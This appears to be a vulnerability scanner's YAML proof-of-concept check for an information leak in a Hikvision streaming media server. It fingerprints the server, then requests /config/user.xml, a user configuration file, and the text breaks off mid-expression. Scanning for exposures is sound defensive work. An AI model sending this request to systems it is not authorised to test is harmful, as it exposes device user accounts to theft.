name: poc-yaml-hikvision-info-leak
rules:
- method: GET
path: /
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"
流媒体管理服务器") && response.body.bcontains(b"海康威视")
- method: GET
path: /config/user.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"